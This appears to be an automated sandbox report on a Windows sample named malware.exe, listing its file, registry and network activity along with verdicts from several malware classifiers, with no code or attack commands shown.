29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_C603C4E90ACAD3CB9C280DB62660607F
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.387Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\521F25E202FF760B8461B88413F425E7
29/2/2020 - 1:46:51.434Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.434Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.434Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.434Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.434Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.434Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.575Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.575Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.575Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.575Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.575Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
29/2/2020 - 1:46:51.622Open1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Read1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Write1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D
29/2/2020 - 1:46:51.622Unknown1480C:\malware.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2DBE8B021F9E811DFC8C8A28572A17C05A_EE6FD365CEA70AC1381BEED92EFF2B2D

Process
Trace

Analysis
Reason
Timeout

Status
Sucessfully Executed

Results
1

Registry
Trace
29/2/2020 - 1:45:46.137Write1480C:\malware.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
29/2/2020 - 1:45:46.137Write1480C:\malware.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
29/2/2020 - 1:45:46.137Write1480C:\malware.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
29/2/2020 - 1:45:46.137Write1480C:\malware.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
29/2/2020 - 1:45:46.137Write1480C:\malware.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
29/2/2020 - 1:46:2.825Write1480C:\malware.exeHKCU\Software\Microsoft\GDIPlusFontCachePath
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
29/2/2020 - 1:46:49.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
29/2/2020 - 1:46:49.122Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnable
29/2/2020 - 1:46:49.122Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyServer
29/2/2020 - 1:46:49.122Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyOverride
29/2/2020 - 1:46:49.122Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoConfigURL
29/2/2020 - 1:46:49.122Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoDetect
29/2/2020 - 1:46:49.122Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsSavedLegacySettings
29/2/2020 - 1:46:49.215Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ContentCachePrefix
29/2/2020 - 1:46:49.215Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\CookiesCachePrefix
29/2/2020 - 1:46:49.215Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\HistoryCachePrefix
29/2/2020 - 1:46:49.434Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
29/2/2020 - 1:46:49.434Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
29/2/2020 - 1:46:49.434Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
29/2/2020 - 1:46:49.434Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
29/2/2020 - 1:46:50.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
29/2/2020 - 1:46:50.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
29/2/2020 - 1:46:50.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
29/2/2020 - 1:46:50.12Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
29/2/2020 - 1:46:50.153Delete1480C:\malware.exe\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates75E0ABB6138512271C04F85FDDDE38E4B7242EFE
29/2/2020 - 1:46:50.153Write1480C:\malware.exe\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFEBlob
29/2/2020 - 1:46:50.153Delete1480C:\malware.exe\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates75E0ABB6138512271C04F85FDDDE38E4B7242EFE
29/2/2020 - 1:46:50.153Write1480C:\malware.exe\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFEBlob
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecisionReason
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecisionTime
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecision
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadNetworkName
29/2/2020 - 1:46:50.903Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDetectedUrl
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
29/2/2020 - 1:46:50.903Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
29/2/2020 - 1:46:50.903Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecisionReason
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecisionTime
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecision
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadNetworkName
29/2/2020 - 1:46:50.903Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDetectedUrl
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
29/2/2020 - 1:46:50.903Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
29/2/2020 - 1:46:50.903Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
29/2/2020 - 1:46:50.903Delete1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl

File Summary
Created
Identified: True check_circle

Deleted
Identified: False cancel

Process Summary
Created
Identified: False cancel

Deleted
Identified: False cancel

Registry Summary
Proxy
Identified: False cancel

AutoRun
Identified: False cancel

Created
Identified: True check_circle

Deleted
Identified: True check_circle

Browsers
Identified: False cancel

Internet
Identified: True check_circle

Loading...

DNS
Query
computer localhost arrow_forward computer gateway:50273 code www.google.com.
computer localhost arrow_forward computer gateway:DNS code ocsp.pki.goog.
computer localhost arrow_forward computer gateway:DNS code www.google.com.

Response
computer gateway:DNS arrow_forward computer localhost code www.google.com. reply_all 172.217.30.100

computer gateway:DNS arrow_forward computer localhost code ocsp.pki.goog. reply_all 216.58.202.163


TCP
Info
computer localhost:65192 arrow_forward 172.217.30.100:443
216.58.202.163:80 arrow_forward computer localhost:65193
computer localhost:65191 arrow_forward 172.217.30.100:80
172.217.30.100:443 arrow_forward computer localhost:65192
172.217.30.100:80 arrow_forward computer localhost:65191
computer localhost:65193 arrow_forward 216.58.202.163:80

UDP
Info
computer localhost:55394 arrow_forward computer localhost:53
computer localhost:50273 arrow_forward computer localhost:53
computer localhost:53 arrow_forward computer localhost:50273
computer localhost:53 arrow_forward computer localhost:55394
computer localhost:67 arrow_forward computer localhost:68
computer localhost:68 arrow_forward help_outline 255.255.255.255:67

HTTP
Info
computer localhost send GET ocsp.pki.goog attach_file /gts1o1/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRCRjDCJxnb3nDwj%2Fxz5aZfZjgXvAQUmNH4bhDrz5vsYJ8YkBug630J%2FSsCEQDvdxhhS3x8DggAAAAALnGY
computer localhost send GET www.google.com attach_file /
computer localhost send GET ocsp.pki.goog attach_file /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjtJqhjYqpgSVpULg%3D

Summary
DNS
True check_circle

TCP
True check_circle

UDP
True check_circle

HTTP
True check_circle

Results
BINARY
KNN (K=3, NFS-BRMalware)
confidence: 66.67%
suspicious: False cancel

Decision Tree (NFS-BRMalware)
confidence: 100.00%
suspicious: False cancel

SVC (Kernel=Linear, NFS-BRMalware)
confidence: 72.95%
suspicious: False cancel

MalConv (Ember: Raw Bytes, Threshold=0.5)
confidence: 80.96%
suspicious: True check_circle

Random Forest (100 estimators, NFS-BRMalware)
confidence: 52.00%
suspicious: False cancel

Non-Negative MalConv (Ember: Raw Bytes, Threshold=0.35)
confidence: 74.41%
suspicious: False cancel

LightGDM (Ember: File Characteristics, Threshold=0.8336)
confidence: 99.99%
suspicious: True check_circle

Add to Collection
Download